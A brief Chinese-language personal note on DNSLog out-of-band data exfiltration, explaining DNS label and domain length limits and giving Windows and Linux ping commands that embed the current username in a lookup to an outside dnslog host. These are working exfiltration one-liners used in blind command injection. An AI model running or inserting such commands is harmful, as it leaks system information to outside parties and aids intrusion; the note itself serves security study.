created: 2025-05-11 14:36 tags: - DNS Type: Note aliases: - dnslog - dnslog外带 updated: 2025-05-11 14:37
原理
dnslog外带回显有长度限制,单标签最大63字节,完整域名最大255字节,实际可用长度更短,需注意分包处理。
#windows ping %USERNAME%.ci.dnslog.pw #linux ping `whoami`.ci.dnslog.pw
参考: DNSLog外带 - hello_bao - 博客园